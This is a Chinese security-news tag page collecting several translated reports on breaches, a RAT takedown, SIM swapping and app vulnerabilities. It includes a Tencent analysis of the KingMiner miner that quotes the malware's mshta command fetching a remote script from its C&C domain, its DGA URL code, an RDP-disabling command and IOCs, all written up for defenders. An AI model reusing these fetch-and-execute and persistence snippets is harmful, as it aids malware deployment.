标签: 黑客事件

欧洲刑警组织逮捕 IM-RAT 背后 13 名黑客

欧洲刑警组织于上周宣布,他们在近期的一项国际执法行动中成功打击了Imminent Monitor RAT背后的犯罪网络。 Imminent Monitor RAT是一种可以让网络犯罪分子远程完全控制受害者的计算机的工具,被卖给了14,500多名买家,受害者覆盖124个国家。 此次行动还关闭了Imminent Monitor的基础架构和销售网站,这使得新老买家都无法使用该木马。 该黑客工具一开始被作为一种合法的远程管理框架而推广,随后被广泛用于访问用户的计算机,使得黑客得以窃取用户的在线银行和其他金融帐户的登录信息。 欧洲刑警组织还于今年6月对澳大利亚和比利时的IM-RAT开发商和雇员签发了搜查令,此次行动很有可能是为了确认该工具的转售者和用户。刑警组织还在澳大利亚,哥伦比亚,捷克,荷兰,波兰,西班牙,瑞典和英国逮捕了IM-RAT的13个重要客户。 执法人员还从客户手中缉获了430多种设备,并对大量计算机和IT设备进行了分析。 IM-RAT可以使攻击者完全控制受害者的计算机,从而使他们可以在受害者不知情的情况下执行以下所列的各种恶意行为: 1.记录击键, 2.从浏览器中窃取数据和密码, 3.通过网络摄像头监视受害者, 4.下载/执行文件, 5.禁用防病毒和防恶意软件, 6.终止正在运行的进程, 7.执行许多其他操作。 由于IM-RAT的功能,易用性以及终身访问权限,其成本仅为25美元,因此被评定为危险级别。 欧洲刑警组织欧洲网络犯罪中心(EC3)负责人史蒂文·威尔逊说道:“地球另一端的黑客现在只用花25美元就可以通过点击鼠标,访问我们的个人详细信息和亲人的照片,甚至监视我们。” 执法人员认为,IM-RAT受害者的数量下降了数万人,“调查人员已经取得了黑客窃取个人详细信息,密码,私人照片,录像带和数据的犯罪证据”。 在其他类似的国际联合行动中,名为Luminosity Link的远程访问木马的犯罪网络也于两年前被关停。 在Luminosity Link案中,一名21岁开发人员因非法使用计算机,洗钱和非法转移财产而被捕,并被判处 30个月监禁。 为避免成为此类威胁的受害者,我们建议个人用户和组织使您的所有软件升级至最新版本,正确配置防火墙,避免打开可疑的电子邮件附件或URL,并在不同网站上使用不同的密码。   消息来源:TheHackerNews, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

2100 万 Mixcloud 用户数据在暗网出售

在线音乐流媒体服务Mixcloud最近遭到黑客的攻击,用户数据在暗网上出售。 近期,一名昵称为“ A_W_S”的黑客联系了多家媒体曝光了此事件,并提供了数据样本作为数据泄露的证据。 此次攻击发生在11月初,超过2000万个用户帐户的数据遭到曝光。这些数据包括用户名,电子邮件地址,SHA-2哈希密码,帐户注册日期和国家/地区,最近一次登录日期,IP地址以及个人资料照片的链接。 Techcrunch发布的文章称:“我们通过注册功能验证了部分被盗数据。这些被盗数据的确切数量仍是未知。卖方说他们拥有2000万条记录,但暗网上存在2100万条。但根据我们采样的数据,记录可能多达2200万条。” 黑客以0.27比特币(约合2,000美元)的价格出售这些数据。 图片来源:ZDNet   上周六,Mixcloud发布安全公告披露了该事件,该公司同时强调,系统没有存储完整的信用卡号或邮寄地址之类的数据。 “今天晚上我们收到了可信的报告,证实了黑客访问了我们的部分系统。” “此次事件事件涉及电子邮件地址,IP地址和少数用户的密码(安全加密状态)。大多数Mixcloud用户使用Facebook账号进行了注册,我们没有存储这些用户的密码。” Mixcloud 目前正在积极调查此事件,并且建议用户将密码重置。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Magento Marketplace 数据遭到泄露,用户信息被出售

如果你曾经在Magento官方市场上注册过一个帐户来购买或出售任何扩展程序,插件或电子商务网站主题,那么你现在要立刻修改你的密码了。 拥有Magento电子商务平台的公司Adobe今天公布了一项新的数据泄露事件,Magento Marketplace 用户的帐户信息被暴露给了黑客。 据该公司称,黑客利用了其网站上一个未公开的漏洞,并用未经授权的第三方身份访问数据库并获取了注册用户的信息,包括客户(买方)和开发人员(卖方)。 数据库中的信息包括受影响的用户的姓名,电子邮件地址,MageID,账单和送货地址信息以及一些商业信息。 尽管Adobe没有透露或者可能他们也不知道Magento市场何时遭到的攻击,但该公司已经确认其安全团队于11月21日发现了这一漏洞。 除此之外,Adobe还保证,黑客无法破坏Magento的核心产品和服务,也就是说黑客无法通过访问Marketplace上托管的主题和插件来添加任何后门或恶意代码,用户可以安全下载。 “ 11月21日,我们发现了Magento Marketplace的漏洞。我们当时暂时关闭了Magento Marketplace以解决此问题。目前Marketplace已经重新上线。此次事件并未影响任何Magento核心产品或服务的运行” ,Adobe商务产品和平台副总裁Jason Woosley 发表声明说。 Adobe没有透露受影响的用户和开发人员的数量,但它已经开始通过电子邮件通知受影响的客户。 尽管Adobe并未明确提及帐户密码也已泄露,但他们仍然建议用户更改该密码,如果用户在其他网站使用了相同的密码,最好也对这些密码进行更改。   消息来源:TheHackerNews, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

针对 SQL 弱口令的爆破攻击再度袭来,KingMiner 矿工已控制上万台设备

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/ZothuAaH-r1xH6HFUbz–A   一、背景 腾讯安全御见威胁情报中心检测到KingMiner变种攻击,KingMiner是一种针对Windows服务器MS SQL进行爆破攻击的门罗币挖矿木马。该木马最早于2018年6月中旬首次出现,并在随后迅速发布了两个改进版本。攻击者采用了多种逃避技术来绕过虚拟机环境和安全检测,导致一些反病毒引擎无法准确检测。 当前版本KingMiner具有以下特点: 1.针对MSSQL进行爆破攻击入侵; 2.利用WMI定时器和Windows计划任务进行持久化攻击; 3.关闭存在CVE-2019-0708漏洞机器上RDP服务,防止其他挖矿团伙入侵,以独占服务器资源挖矿; 4.使用base64和特定编码的XML、TXT、PNG文件来加密木马程序; 5.利用微软和多个知名厂商的签名文件作为父进程,“白+黑”启动木马DLL。 根据腾讯安全御见威胁情报中心统计数据,KingMiner影响超过一万台电脑,其中受影响最严重的地区为广东、重庆、北京、上海等地。 二、详细分析 KingMiner在MS SQL爆破入侵成功后,首先执行一段VBS脚本(tl.txt/vk.txt),检测操作系统版本,并根据不同的系统版本下载不同的Payload文件,利用下载的文件进行提权以及门罗币挖矿。同时还会安装WMI定时器和Windows计划任务来反复执行指定脚本,执行服务器返回的恶意代码达到持久化攻击的目的。 KingMiner变种攻击流程 提权 vk.txt从http[:]// w.30713fdae.tk/32tl.zip下载经过base64编码的二进制blob文件,经过解码后保存为C:\Users\Public\Downloads\<random>\tool.exe tool.exe利用Windows权限提升漏洞CVE-2019-0803进行攻击,成功利用此漏洞的攻击者可以在内核模式下运行任意代码,然后可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。 tool.exe在特权模式下执行命令 mshta.exe vbscript:GetObject(\"script:http[:]//aa.30583fdae.tk/r1.txt\")(window.close) 通过mshta.exe执行脚本r1.txt来进行持久化。 持久化 计时器(每15分钟执行一次VBS脚本) r1.txt配置名为WindowsSystemUpdate _WMITimer的计时器,并将执行一段脚本代码的事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate_filter绑定到计时器,从而通过计时器每15分钟执行一次下面的VBS脚本代码: 这段VBS代码根据不同情况采取两种方法生成URL,接着通过访问生成的URL下载第二阶段的Payload运行。 1.URL由IP地址转化为ASCII后拼接而成 脚本运行nslookup命令查询C&C域名news.g23thr.com的DNS记录,当news.g23thr.com解析的IP地址为xxx.xxx.xxx.120,则访问URL “http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/mgxbox.txt” 2.URL由与时间相关的DGA域名拼接而成 当查询DNS返回IP不符合指定格式,则DGA域名通过当前时间的年、月、日、分钟、秒数值计算得到,算法如下: u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt" 计划任务 r1.txt通过RegisterTaskDefinition创建名为WindowsMonitor的计划任务,每15分钟执行一次如下脚本;或者安装触发条件为系统启动的计划任务WindowsHelper,并在WindowsHelper触发后再次安装WindowsMonitor定时任务执行同一段脚本: 计划任务最终执行的脚本如下: 计划任务执行的VBS脚本与WMITimer执行的脚本类似,通过DNS查询返回的数据,或者获取时间转换后生成的DGA域名拼接URL,执行访问URL后返回的代码。 url=“http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/pow.txt” 或者 u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"url = "http://"&minute(now())&second(now())&"."&u&"/pow.txt" 当前访问url返回的代码如下: CreateObject("WScript.Shell").Run "cmd /c ver |findstr ""5.0 5.1 5.2 6.0 6.1""&&wmic qfe GET hotfixid |findstr /i ""kb4499175 kb4500331 KB4499149 KB4499180 KB4499164""||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0",0,False 返回代码的功能为: 获取计算机版本,并判断计算机版本是否受CVE-2019-0708漏洞的影响,且计算机是否安装特定补丁(kb4499175、kb4500331、KB4499149、KB4499180、KB4499164为微软发布的CVE-2019-0708远程桌面服务远程代码执行漏洞的补丁号)。 如果没有安装补丁,则修改设置禁止其他机器通过远程桌面服务访问本机,通过这种方式来阻止其他木马进入系统,从而达到独占挖矿资源的目的。 挖矿 vbs脚本tl.txt从http[:]// w.30713fdae.tk/32a1.zip下载经过base64编码的二进制blob文件。 文件解码并解压后保存至C:\Users\Public\Downloads\<random>\目录下,其中<random>为取当前时间“年月日时分秒”格式生成的字符。 alger.exe为微软系统文件credwiz.exed,功能描述为Credential Backup and Restore Wizard(凭据备份和还原向导),该程序在启动后自动加载系统DLL文件duer.dll并调用其导出函数InitGadgets()。 除了微软系统文件外,KingMiner在挖矿木马的“白+黑”启动过程中还利用了多个知名公司的含数字签名的文件来逃避杀软检测,利用正常的有数字签名的白文件来调用恶意dll。 目前发现的包括以下数字签名的文件被利用: “GuangZhou KuGou Computer Technology Co.,Ltd.” “Google Inc” “福建创意嘉和软件有限公司” 32a1.zip/64a1.zip解压后在同一目录下释放受信任的系统文件alger.exe(credwiz.exed)和恶意的duer.dll,利用alger.exe加载duer.dll并调用其导出的InitGadgets(),从而在InitGadgets()中解密保存在同目录下的x.txt或x/y/z.png中的XMRig挖矿程序代码,并启动门罗币挖矿过程。 三、安全建议 我们建议企业针对KingMiner挖矿木马的技术特点采取针对性的防御措施: 1.根据微软官方公告修复特权提升漏洞CVE-2019-0803: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803 2、加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿继续使用弱口令,特别是sa账号密码,防止黑客暴力破解。 3、修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。 4、企业用户可在服务器部署腾讯御点终端安全管理系统,从而防范此类攻击。 5、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 腾讯御界检测到针对SQL服务器的爆破攻击 IOCs @KingMiner IP 107.154.161.209 107.154.158.39 Domain q.112adfdae.tk q.30583fdae.tk aa.30583fdae.tk w.30713fdae.tk a.1b051fdae.tk news.g23thr.com a.qwerr.ga w.ddff1.tk Md5 duser.dll 20e502ff977b336d9e7785186b16c68a 78b56b92c2e7a42520fb99a84d78cf92 active_desktop_render_x64.dll 21048ff02894656b5b24d4ed3c8a2882 goopdate.dll 7def058c5d2acb660f394d04b4698580 soundbox.dll 88a5c4645c2a9d0481fd0a846e49b773 64tl.zip be45959bc043a4fe88351cd03289f240 64a1.zip 4d910cb71c2f55bde48521f7ae062da4 32a1.zip 465373b74d163028add70f0d2b0966d0 23ef4da80f6985a78c4a59467ac4612f 32tl.zip e09947875b4722aab067c4d0c4b30384 r1.txt 21cb01553d92bee4fefc0069db1fd5ea c568d6028735cdc2a1ddd3c01f14ca80 tl.txt b0ab674b842822358be8cd5f6dc91554 vk.txt e3accf5a6f58932e56192bfbcbf0804c c874dbb6bf3664990b57d07d7d220ee6 n.txt 2b702a22963448c164db26807a308d50 pow.txt/mgxbox.txt 03d24675d4de12bcd076e7eff213a8a4 htak.txt 5fd47b2be01004e41290bf7658c7ad5a tool.exe 4899762134c0d2d8fbbaecc289a0c74e URL http[:]//4056.309cffdae.tk/vk.txt http[:]//3023.309cffdae.tk/vk.txt http[:]//5311.1d28ebfdae.com/pow.txt http[:]//3843.1d28ebfdae.com/pow.txt http[:]//5921.1d28ebfdae.com/mgxbox.txt http[:]//ww33.3096bfdae.com/32a1.cab http[:]//ww33.3096bfdae.com/64a1.cab http[:]//a.qwerr.ga/32a.zip http[:]//a.qwerr.ga/64f.zip http[:]//aa.30583fdae.tk/r1.txt http[:]//aa.30583fdae.tk/tl.txt http[:]//aa.30583fdae.tk/r1.txt http[:]//q.30583fdae.tk/32tl.zip http[:]//q.30583fdae.tk/64tl.zip http[:]//q.30583fdae.tk/64a1.zip http[:]//q.30583fdae.tk/32a1.zip http[:]//w.30713fdae.tk/vyk.txt http[:]//w.30713fdae.tk/64a1.zip http[:]//w.30713fdae.tk/32a1.zip http[:]//w.ddff1.tk/32a1.zip http[:]//w.ddff1.tk/64a1.zip 矿池: 95.179.131.54:9761 w.homewrt.com:9761 钱包: 49EHNacRauzgz8cGouhrVChcLyF3XrGLAdWiczJxY1qpX3oed4cGgMUUHHhyR7taGJ1MtvpfJiDf9gugAko4MzXM9DRYzZ1 参考链接: https://research.checkpoint.com/2018/kingminer-the-new-and-improved-cryptojacker/

黑客盗取上万条 Disney+ 帐户并出售

黑客在Disney +启动数小时后便开始劫持用户帐户。许多帐户现在可以在黑客论坛上免费获得,或以3美元至11美元不等的价格出售。 接连不断的投诉 Disney +视频流媒体服务于11月12日启动。虽然只有美国,加拿大和荷兰可以享受Disney +服务,但其网站在开始的24小时内已经有超过1000万注册用户。 Disney +服务遇到了许多技术问题。许多用户报告他们喜欢的电影和节目无法播放。但在对技术问题的抱怨声中,还有一小部分用户报告无法访问其帐户。Twitter和Reddit等社交网络充斥着诸如此类的投诉。 许多用户报告说,黑客正在访问他们的帐户,将其从所有设备中注销,然后更改该帐户的电子邮件和密码,从而完全盗取了该帐户。 部分用户承认他们在其他网站使用了和Disney +帐户一样的密码,其他用户在网上说他们重新设置了密码。 这表明,在某些情况下,黑客可以使用在其他站点泄露的电子邮件和密码组合来访问帐户,而在其他情况下,Disney +密码可能是从感染了键盘记录或信息窃取恶意软件的用户那里获得的。 待售! 黑客将Disney +帐户货币化的速度令人震惊。服务启动后数小时内,帐户就在黑客论坛上出售。价格从每个帐户3美元到最高11美元不等——这比迪士尼合法的Disney +帐户的费用7美元还高。 Disney +可以做的是进行身份验证,这可以避免因为密码重用导致的攻击。 Disney +推出的目的在于与其他流媒体进行抗争。黑客论坛上充斥着被黑客入侵的Amazon Prime,Hulu和Netflix帐户。黑客仍然定期销售这些账户是因为一直有市场需求。 Disney +用户最好对帐户设置唯一的密码。这无法阻止设备上的恶意软件窃取密码,但可以防止黑客通过猜测密码窃取帐户。   消息来源:ZDNet, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

两名黑客通过 SIM 卡交换攻击窃取 55 万美元加密货币,随后被捕

  今年2月美国首次对 SIM卡交换攻击予以定罪,此后,美国司法部对多人提起诉讼,指控他们从受害者手中窃取数百万美元加密货币。 美国当局于周四从马萨诸塞州逮捕了涉嫌网络犯罪的黑客,并指控他们在2015年11月至2018年5月之间通过SIM卡交换攻击从至少10名受害者中窃取了55万美元的加密货币。 SIM交换或SIM劫持涉及到了移动电话提供商的社交服务。黑客假冒用户身份,要求提供商将电话号码移植到自己的SIM卡上。 一旦成功,攻击者就可以获取目标手机上的一次性密码,验证码和双重验证,以便重置密码并获得对用户的社交媒体,电子邮件,银行和加密货币帐户的访问权限。 黑客还针对加密货币公司的高管 根据起诉书,两名被告Eric Meiggs(20)和Declan Harrington(21)不仅攻击加密货币金额较高的用户,他们还通过攻击加密货币公司高管谋取巨额利润。 除此之外,两名被告还被指控盗取受害者的社交媒体帐户,其中包括两名“具有高价值或’OG’(’黑帮’的俚语)的社交媒体帐户”。 该二人已被控以11项指控,罪名是: ·串谋电汇欺诈 ·八项电汇欺诈罪 ·计算机欺诈和滥用罪 ·严重的身份盗窃罪 如果被判诈骗罪,这两名被告将面临最高20年监禁的处罚。同时,严重的身份盗窃指控最高可判处2年有期徒刑。 如何保护自己免受SIM卡交换攻击 在发生几次“ SIM卡交换”事件之后,美国联邦贸易委员会(FTC)于10月发布了准则列表,用户可以遵循这些准则来保护自己免受SIM交换攻击: 1.不要回复要求个人信息的电话,电子邮件或短信。 2.限制在线共享的个人信息。 3.设置账户PIN或密码。 4.对于具有敏感信息或财务信息的帐户建议使用更强的身份验证。 如果您遭遇了SIM卡交换攻击,可以采取一些抢救措施,例如: 1.立即联系您的服务提供商,举报欺诈行为并重新取回您的电话号码,并且立即更改您的帐户密码。 2.检查您的信用卡,银行和其他金融帐户是否被盗刷,如果发现任何损失,立马向银行报告。   消息来源:TheHackerNews, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

WhatsApp 存在新漏洞, 黑客可能秘密在你的设备上安装间谍软件

WhatsApp上个月悄悄修补了其应用程序中的一个关键漏洞,该漏洞可能使攻击者远程破坏目标设备并可能窃取存储在其中的安全聊天消息和文件。 旧的WhatsApp版本在解析MP4文件的基本流元数据的过程中会导致堆栈的缓冲区溢出。该漏洞(CVE-2019-11931)容易引发DoS攻击或远程执行代码的攻击。 如果想要远程利用此漏洞,攻击者需要的只是目标用户的电话号码,并通过WhatsApp向他们发送恶意制作的MP4文件,该文件最终可以在受感染的设备上静默安装恶意后门或间谍软件。 该漏洞影响所有主要平台(包括Google Android,Apple iOS和Microsoft Windows)的WhatsApp的消费者以及企业应用程序。 根据Facebook发布的报告,受影响的应用程序版本列表如下: 低于2.19.274的Android版本 低于2.19.100的iOS版本 低于2.25.3的企业客户端版本 包括2.18.368在内的Windows Phone版本 适用于Android 2.19.104之前版本的业务 适用于iOS 2.19.100之前版本的业务 目前,所有用户需要将WhatsApp更新至最新版本,并禁止从应用程序设置中自动下载图像,音频和视频文件。 WhatsApp告诉THN:“ WhatsApp一直在努力提高服务的安全性。我们针对已解决的潜在问题进行公开报告,并根据行业最佳实践进行了修复。在这种情况下,没有理由相信用户受到了影响。”   消息来源:TheHackerNews, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

报告称全球约 72% 的零售商是网络攻击的受害者

据外媒Betanews报道,Keeper Security 和 Ponemon Institute 的一项新调查结果指出,全球约有72%的零售商遭受了网络攻击,去年有61%遭受过一次网络攻击,但是50%的企业没有针对数据泄露的应对计划。 调查结果也说明每一起网络攻击涉及的客户/员工数据丢失导致平均7772个客户的个人记录丢失或被盗,每一起网络攻击造成的正常运营中断平均导致近190万美元损失。 在接受调查的零售商中,有87%同意网络攻击变得更有针对性,有67%认为网络攻击越来越严重,另有61%认为网络攻击越来越复杂。最常见的攻击方法是网络钓鱼(69%),基于网络的攻击(54%)和恶意软件攻击(40%)。 从这些攻击背后的因素来看,预算是零售商最担忧的问题。只有三分之一的零售商认为他们有足够的预算来实现强大的IT安全性。但是,有93%的零售商在安全方面的支出不到总IT预算的20%,平均支出为11.5%。人员不足(91%),预算不足(51%)以及对如何保护自己免受网络攻击的理解(40%)是阻碍充分有效的安全态势的最常被提及的挑战。 Keeper Security首席执行官兼联合创始人Darren Guccione表示:“暗网上有数十亿个被盗凭证,网络罪犯可以等待数月之久的主要机会,例如高峰购物季节,以利用零售商的安全漏洞并进行非法购买。现实是,零售业面临的网络安全问题不是金钱或人员问题,而是思维定势。零售商需要知道存在易于实施,具有成本效益的安全解决方案,这些解决方案可以大大增强其安全状况并在很大程度上防止此类网络犯罪发生。”   (稿源:cnBeta,封面源自网络。)

勒索软件攻击加拿大Nunavut地区 当地政府所有电子信息服务瘫痪

勒索软件攻击了加拿大Nunavut地区,政府的所有联网服务都受到了影响。Nunavut地区面积超过190万平方公里,人口约36,000。 当地政府称:“在2019年11月2日(星期六),一种新型的勒索软件影响了整个城市。勒索软件会加密各种服务器和工作站上的单个文件。除了Qulliq能源公司以外,所有需要访问GN网络上存储的电子信息的政府服务都受到了影响。” 特区区长乔·萨维卡塔克(Joe Savikataaq)说:“我向Nunavut保证,我们正在尽全力解决这个问题。基本服务将不会受到影响,并且在此期间GN将继续运行。重新上线时可能会导致些许延迟,我感谢大家的耐心和理解。” 一半的GN IT系统今天清晨被针对公共服务的病毒入侵。我们会全天候工作,排查问题并让电脑恢复上网功能。在问题获得全面解决之前,您将无法访问您的GN帐户。 据CBC报道,勒索信息具体内容如下: “您的网络已被渗透,全部文件已被强大的算法进行了加密。我们可以为您提供解密软件。如果您一直未进入链接取得密钥,您的数据将被完全删除。” 专家注意到,勒索信息要求受害者下载加密的浏览器并在21天内访问指定的URL,专家注意到勒索信息是用生硬的英语书写的。   消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Android NFC 漏洞可被黑客拿来传播植入恶意软件

ZDNet 报道称,近期曝光的一个 Android 漏洞,导致黑客能够利用设备上的近场接触(NFC)功能,向受害者传播植入恶意软件。CVE-2019-2114 漏洞报告指出,问题源自一项鲜为人知的 Android OS 功能,它就是 NFC Beaming 。所有运行 Android 8 Oreo 及以上版本的设备,都会受到影响。 据悉,NFC 广播通过设备内部的 Android OS 服务(Android Beam)来工作。 (截图 via ZDNet) 这项服务允许 Android 设备使用近场通讯(NFC)技术来替代 Wi-Fi 或蓝牙,将图像、文件、视频、甚至应用程序,发送到另一台设备上。 通常情况下,通过 NFC 传输的 APK 安装包会存储在设备上,并在屏幕上显示相关通知,询问用户是否允许安装未知来源的应用程序。 然而今年 1 月,一位名叫 Y. Shafranovich 的安全研究人员发现:在 Android 8(Oreo)或更高版本的系统上通过 NFC 广播来发送应用程序,并不会显示这一提示。 相反,该通知允许用户一键安装应用程序,而不发出任何安全警告。 尽管缺少一个提示,听起来似乎并不那么重要,但它还是成为了 Android 安全模型中的一个重大问题。 庆幸的是,谷歌已在 2019 年 10 月修复了这个影响 Android 设备的 NFC Beaming 漏洞。 “未知来源”的定义,特指通过官方 Play 商店之外安装的任何东西,其默认都被视为不受信任和未经验证。 若用户需要侧载外部应用,必须前往设置菜单,然后手动启用“允许从未知来源安装应用”。 Android 8 Oreo 之前,这项设置并没有什么问题。然而从 Android 8 Oreo 开始,谷歌将这种机制重新设计为基于 App 的设置。 在 CVE-2019-2114 漏洞中,Android Beam 竟然被列入了白名单,获得了与官方 Play 应用商店相同的信任权限。 谷歌表示,Android Beam 服务从来就不是安装应用程序的一种方式,而仅仅是一种在设备之间传输数据的方式。 即便如此,该公司还是在 2019 年 10 月的 Android 安全补丁中,将 Android Beam 踢出了这款移动操作系统中的受信任来源列表。 (图自:LG)   对于数百万仍处于危险之中的 Android 用户,我们在此建议大家尽快升级手机的安全补丁、或者尽量在不使用时关闭 NFC 和 Android Beam 功能。   (稿源:cnBeta,封面源自网络。)